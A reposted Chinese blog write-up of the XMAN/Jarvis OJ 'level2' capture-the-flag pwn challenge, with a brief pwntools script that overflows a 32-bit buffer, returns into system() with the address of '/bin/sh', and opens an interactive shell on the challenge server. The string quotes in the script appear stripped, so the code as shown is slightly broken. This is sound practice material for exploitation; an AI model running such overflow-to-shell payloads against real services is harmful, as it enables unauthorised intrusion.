码迷,mamicode.com
首页 > 其他好文 > 详细

[XMAN]level2

时间:2018-07-29 17:53:41      阅读:112      评论:0      收藏:0      [点我收藏+]

标签:bin   viso   ida   分享   inter   cti   图片   .com   地址   

 

技术分享图片

老套路

checksec

技术分享图片

ida查看

技术分享图片

技术分享图片

覆盖掉

之后system地址再返回覆盖 最后/bin/sh地址

# -*- coding:utf-8 -*-

from pwn import *


sh = remote(pwn2.jarvisoj.com, 9878)  # remote


junk = a * 0x88 

fakebp = a*4

sh_address = 0x0804A024  # /bin/sh

sys_address = 0x08048320


payload = junk + fakebp + p32(sys_address)+aaaa+p32(sh_address)

sh.send(payload)

sh.interactive()

 

[XMAN]level2

标签:bin   viso   ida   分享   inter   cti   图片   .com   地址   

原文地址:https://www.cnblogs.com/alyx/p/9385922.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!